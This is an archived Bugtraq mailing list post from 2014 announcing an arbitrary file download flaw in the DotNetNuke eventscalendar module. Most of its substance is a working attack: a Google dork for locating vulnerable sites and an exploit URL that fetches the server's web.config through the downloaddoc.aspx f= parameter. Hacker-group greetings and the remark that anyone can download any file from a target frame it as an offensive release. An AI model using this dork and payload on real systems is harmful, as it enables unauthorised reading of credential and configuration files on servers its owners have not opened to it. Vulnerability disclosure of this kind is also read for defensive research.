Bugtraq mailing list archives
DNN (DotNetNuke®) eventscalendar Module Arbitrary File Download Vulnerability
From: cseye_ut () yahoo com
Date: Mon, 9 Jun 2014 05:31:13 GMT
#+++++++++++++++++++++++++++++++++++++++++++++++++++++++++ # Title : DNN (DotNetNuke®) eventscalendar Module Arbitrary File Download Vulnerability # Author : alieye # vendor : http://www.invenmanager.com/ , http://store.dnnsoftware.com/ # Contact : cseye_ut () yahoo com # Risk : High # Class: Remote # Google Dork: inurl:/desktopmodules/eventscalendar/ # Version: all version # Date: 09/06/2014 # os : windows server 2008 #++++++++++++++++++++++++++++++++++++++++++++++++++++++++ You can download any file from your target ;) Exploit : http://victim.com/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config #++++++++++++++++++++++++++++++++++++++++++++++++++++++++ [#] Spt Tnx To ZOD14C , 4l130h1 , bully13 , andelos , 3.14nnph , f4rm4nd3 and all cseye members [#] Thanks To All Iranian Hackers [#] website : http://cseye.vcp.ir/ #++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Current thread:
- DNN (DotNetNuke®) eventscalendar Module Arbitrary File Download Vulnerability cseye_ut (Jun 09)